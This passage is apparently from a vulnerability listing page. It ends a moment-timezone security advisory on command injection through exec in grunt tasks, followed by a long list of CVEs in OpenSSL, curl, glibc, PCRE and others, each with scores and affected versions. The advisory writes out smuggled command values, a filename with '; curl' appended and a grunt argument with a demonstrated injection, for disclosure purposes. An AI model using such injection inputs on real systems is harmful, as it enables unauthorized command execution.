is exacerbated by timezone data being downloaded via cleartext FTP (described above), but beyond that, an attacker at iana.org able to modify the timezone files could disrupt any systems that build moment-timezone. ``` 15 files = grunt.file.expand({ filter : 'isFile', cwd : 'temp/zic/' + version }, '**/*'); ... 27 function next () { ... 33 var file = files.pop(), 34 src = path.join(zicBase, file), 35 dest = path.join(zdumpBase, file); 36 exec('zdump -v ' + src, { maxBuffer: 20*1024*1024 }, function (err, stdout) { ``` In this case, an attacker able to add a file to `temp/zic/2014d` (for example) with a filename like `Z; curl www.example.com` would influence the called to exec on line 36 and run arbitrary code. There are a few minor challenges in exploiting this, since the string needs to be a valid filename. #### Command Injection via data-zic.js Similar to the vulnerability in /tasks/data-download.js, the /tasks/data-zic.js script takes a version from the command line and uses it as part of a command line, executed without sanitization. ``` 10 var done = this.async(), 11 dest = path.resolve('temp/zic', version), ... 22 var file = files.shift(), 23 src = path.resolve('temp/download', version, file); 24 25 exec('zic -d ' + dest + ' ' + src, function (err) { ``` As a result, an attacker able to influence that string can run arbitrary commands. Of course, it requires an attacker able to influence the command passed to grunt, so may be unlikely in practice. ``` root@e94ba0490b65:/usr/src/app/moment-timezone# grunt 'data-zic:2014d; echo hi > /tmp/evil; echo ' Running "data-zic:2014d; echo hi > /tmp/evil; echo " (data-zic) task exec: zid -d /usr/src/app/moment-timezone/temp/zic/2014d; echo hi > /tmp/evil; echo /usr/src/app/moment-timezone/temp/download/2014d; echo hi > /tmp/evil; echo /africa ... root@e94ba0490b65:/usr/src/app/moment-timezone# cat /tmp/evil hi ``` ### Patches The supplied patch on top of 0.5.34 is applicable with minor tweaks to all affected versions. It switches `exec` to `execFile` so arbitrary bash fragments won't be executed any more. ### References * https://knowledge-base.secureflag.com/vulnerabilities/code_injection/os_command_injection_nodejs.html * https://auth0.com/blog/preventing-command-injection-attacks-in-node-js-apps/LOW

                NVD: n/a

                RedHat: n/a

                • 8.7.1
                • 8.7.0
                • 8.6.2
                • 8.6.1
                • 8.6.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-0464A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this vulnerability by creating a malicious certificate chain that triggers exponential use of computational resources, leading to a denial-of-service (DoS) attack on affected systems. Policy processing is disabled by default but can be enabled by passing the `-policy' argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()' function.LOW

                NVD: 7.5

                RedHat: 5.9

                • 8.7.0
                • 8.6.2
                • 8.6.1
                • 8.6.0
                • 8.5.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-0465Applications that use a non-default option when verifying certificates may be vulnerable to an attack from a malicious CA to circumvent certain checks. Invalid certificate policies in leaf certificates are silently ignored by OpenSSL and other certificate policy checks are skipped for that certificate. A malicious CA could use this to deliberately assert invalid certificate policies in order to circumvent policy checking on the certificate altogether. Policy processing is disabled by default but can be enabled by passing the `-policy' argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()' function.LOW

                NVD: 5.3

                RedHat: 5.3

                • 8.7.0
                • 8.6.2
                • 8.6.1
                • 8.6.0
                • 8.5.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-0466The function X509_VERIFY_PARAM_add0_policy() is documented to implicitly enable the certificate policy check when doing certificate verification. However the implementation of the function does not enable the check which allows certificates with invalid or incorrect policies to pass the certificate verification. As suddenly enabling the policy check could break existing deployments it was decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() function. Instead the applications that require OpenSSL to perform certificate policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly enable the policy check by calling X509_VERIFY_PARAM_set_flags() with the X509_V_FLAG_POLICY_CHECK flag argument. Certificate policy checks are disabled by default in OpenSSL and are not commonly used by applications.LOW

                NVD: 5.3

                RedHat: 5.3

                • 8.7.0
                • 8.6.2
                • 8.6.1
                • 8.6.0
                • 8.5.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-27533A vulnerability in input validation exists in curl <8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and "telnet options" during server negotiation. The lack of proper input scrubbing allows an attacker to send content or perform option negotiation without the application's intent. This vulnerability could be exploited if an application allows user input, thereby enabling attackers to execute arbitrary code on the system.LOW

                NVD: 8.8

                RedHat: 4.3

                • 8.6.2
                • 8.6.1
                • 8.6.0
                • 8.5.3
                • 8.5.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-27534A path traversal vulnerability exists in curl <8.0.0 SFTP implementation causes the tilde (~) character to be wrongly replaced when used as a prefix in the first path element, in addition to its intended use as the first element to indicate a path relative to the user's home directory. Attackers can exploit this flaw to bypass filtering or execute arbitrary code by crafting a path like /~2/foo while accessing a server with a specific user.LOW

                NVD: 8.8

                RedHat: 3.7

                • 8.6.2
                • 8.6.1
                • 8.6.0
                • 8.5.3
                • 8.5.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-27536An authentication bypass vulnerability exists libcurl <8.0.0 in the connection reuse feature which can reuse previously established connections with incorrect user permissions due to a failure to check for changes in the CURLOPT_GSSAPI_DELEGATION option. This vulnerability affects krb5/kerberos/negotiate/GSSAPI transfers and could potentially result in unauthorized access to sensitive information. The safest option is to not reuse connections if the CURLOPT_GSSAPI_DELEGATION option has been changed.LOW

                NVD: 5.9

                RedHat: 5.9

                • 8.6.2
                • 8.6.1
                • 8.6.0
                • 8.5.3
                • 8.5.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2023-27538An authentication bypass vulnerability exists in libcurl prior to v8.0.0 where it reuses a previously established SSH connection despite the fact that an SSH option was modified, which should have prevented reuse. libcurl maintains a pool of previously used connections to reuse them for subsequent transfers if the configurations match. However, two SSH settings were omitted from the configuration check, allowing them to match easily, potentially leading to the reuse of an inappropriate connection.LOW

                NVD: 5.5

                RedHat: 5.5

                • 8.6.2
                • 8.6.1
                • 8.6.0
                • 8.5.3
                • 8.5.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-28321The Linux-PAM package before 1.5.2-6.1 for openSUSE Tumbleweed allows authentication bypass for SSH logins. The pam_access.so module doesn't correctly restrict login if a user tries to connect from an IP address that is not resolvable via DNS. In such conditions, a user with denied access to a machine can still get access. NOTE: the relevance of this issue is largely limited to openSUSE Tumbleweed and openSUSE Factory; it does not affect Linux-PAM upstream.LOW

                NVD: 9.8

                RedHat: 9.8

                • 8.6.1
                • 8.6.0
                • 8.5.3
                • 8.5.2
                • 8.5.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-3671A null pointer de-reference was found in the way samba kerberos server handled missing sname in TGS-REQ (Ticket Granting Server - Request). An authenticated user could use this flaw to crash the samba server.LOW

                NVD: 6.5

                RedHat: 6.5

                • 8.4.3
                • 8.4.2
                • 8.4.1
                • 8.4.0
                • 8.3.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-43618GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.LOW

                NVD: 7.5

                RedHat: 6.2

                • 8.4.3
                • 8.4.2
                • 8.4.1
                • 8.4.0
                • 8.3.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-1586An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.LOW

                NVD: 9.1

                RedHat: 7.5

                • 8.4.2
                • 8.4.1
                • 8.4.0
                • 8.3.3
                • 8.3.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-1587An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.LOW

                NVD: 9.1

                RedHat: 7.5

                • 8.4.2
                • 8.4.1
                • 8.4.0
                • 8.3.3
                • 8.3.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-35252When curl is used to retrieve and parse cookies from a HTTP(S) server, itaccepts cookies using control codes that when later are sent back to a HTTPserver might make the server return 400 responses. Effectively allowing a"sister site" to deny service to all siblings.LOW

                NVD: 3.7

                RedHat: 3.1

                • 8.4.1
                • 8.4.0
                • 8.3.3
                • 8.3.2
                • 8.3.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-31151Authorization headers are cleared on cross-origin redirect. However, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There are active users using cookie headers in undici. This may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site. This was patched in v5.7.1. By default, this vulnerability is not exploitable. Do not enable redirections, i.e. `maxRedirections: 0` (the default).LOW

                NVD: 6.5

                RedHat: 3.7

                • 8.4.0
                • 8.3.3
                • 8.3.2
                • 8.3.1
                • 8.3.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-4209A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.LOW

                NVD: 6.5

                RedHat: 6.5

                • 8.3.3
                • 8.3.2
                • 8.3.1
                • 8.3.0
                • 8.2.3
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-27405FreeType commit 53dfdcd8198d2b3201a23c4bad9190519ba918db was discovered to contain a segmentation violation via the function FNT_Size_Request.LOW

                NVD: 7.5

                RedHat: 7.1

                • 8.3.2
                • 8.3.1
                • 8.3.0
                • 8.2.3
                • 8.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-27406FreeType commit 22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5 was discovered to contain a segmentation violation via the function FT_Request_Size.LOW

                NVD: 7.5

                RedHat: 7.1

                • 8.3.2
                • 8.3.1
                • 8.3.0
                • 8.2.3
                • 8.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-22747After accepting an untrusted certificate, handling an empty pkcs7 sequence as part of the certificate data could have lead to a crash. This crash is believed to be unexploitable. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5.LOW

                NVD: 6.5

                RedHat: 4.3

                • 8.3.2
                • 8.3.1
                • 8.3.0
                • 8.2.3
                • 8.2.2
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-27775An information disclosure vulnerability exists in curl 7.65.0 to 7.82.0 are vulnerable that by using an IPv6 address that was in the connection pool but with a different zone id it could reuse a connection instead.LOW

                NVD: 7.5

                RedHat: 7.5

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-27776A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 might leak authentication or cookie header data on HTTP redirects to the same host but another port number.LOW

                NVD: 6.5

                RedHat: 4.3

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-27781libcurl provides the `CURLOPT_CERTINFO` option to allow applications torequest details to be returned about a server's certificate chain.Due to an erroneous function, a malicious server could make libcurl built withNSS get stuck in a never-ending busy-loop when trying to retrieve thatinformation.LOW

                NVD: 7.5

                RedHat: 7.5

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2020-25648A flaw was found in the way NSS handled CCS (ChangeCipherSpec) messages in TLS 1.3. This flaw allows a remote attacker to send multiple CCS messages, causing a denial of service for servers compiled with the NSS library. The highest threat from this vulnerability is to system availability. This flaw affects NSS versions before 3.58.LOW

                NVD: 7.5

                RedHat: 7.5

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2019-20838libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \X or \R has more than one fixed quantifier, a related issue to CVE-2019-20454.LOW

                NVD: 7.5

                RedHat: 7.5

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2020-14155libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.LOW

                NVD: 5.3

                RedHat: 5.3

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-36084The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).LOW

                NVD: 3.3

                RedHat: 3.3

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-36085The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).LOW

                NVD: 3.3

                RedHat: 3.3

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-36086The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).LOW

                NVD: 3.3

                RedHat: 3.3

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-36087The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.LOW

                NVD: 3.3

                RedHat: 3.3

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-36690A segmentation fault can occur in the sqlite3.exe command-line component of SQLite 3.36.0 via the idxGetTableInfo function when there is a crafted SQL query. NOTE: the vendor disputes the relevance of this report because a sqlite3.exe user already has full privileges (e.g., is intentionally allowed to execute commands). This report does NOT imply any problem in the SQLite library.LOW

                NVD: 7.5

                RedHat: n/a

                • 8.2.0
                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2019-18276An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected.LOW

                NVD: 7.8

                RedHat: 7.8

                • 8.1.3
                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 8.0.1
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2025-57352A vulnerability exists in the 'min-document' package prior to version 2.19.0, stemming from improper handling of namespace operations in the removeAttributeNS method. By processing malicious input involving the __proto__ property, an attacker can manipulate the prototype chain of JavaScript objects, leading to denial of service or arbitrary code execution. This issue arises from insufficient validation of attribute namespace removal operations, allowing unintended modification of critical object prototypes. The vulnerability remains unaddressed in the latest available version.LOW

                NVD: n/a

                RedHat: 5.3

                • 8.1.2
                • 8.1.1
                • 8.1.0
                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-20193A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.LOW

                NVD: 3.3

                RedHat: 3.3

                • 8.1.0
                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2016-10228The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.LOW

                NVD: 5.9

                RedHat: 3.3

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2019-25013The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.LOW

                NVD: 5.9

                RedHat: 4.8

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2020-27618The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.LOW

                NVD: 5.5

                RedHat: 5.5

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2020-29562The iconv function in the GNU C Library (aka glibc or libc6) 2.30 to 2.32, when converting UCS4 text containing an irreversible character, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.LOW

                NVD: 4.8

                RedHat: 4.8

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2020-6096An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.LOW

                NVD: 8.1

                RedHat: 8.1

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-27645The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.LOW

                NVD: 2.5

                RedHat: 2.5

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-3326The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.LOW

                NVD: 7.5

                RedHat: 7.5

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-35942The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.LOW

                NVD: 9.1

                RedHat: 9.1

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-23218The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.LOW

                NVD: 9.8

                RedHat: 7

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2022-23219The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.LOW

                NVD: 9.8

                RedHat: 7

                • 8.0.1
                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1
                CVE-2021-45960In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).LOW

                NVD: 8.8

                RedHat: 8.8

                • 8.0.0
                • 9.4.0
                • 9.3.4
                • 9.3.3
                • 9.3.2
                • 9.3.1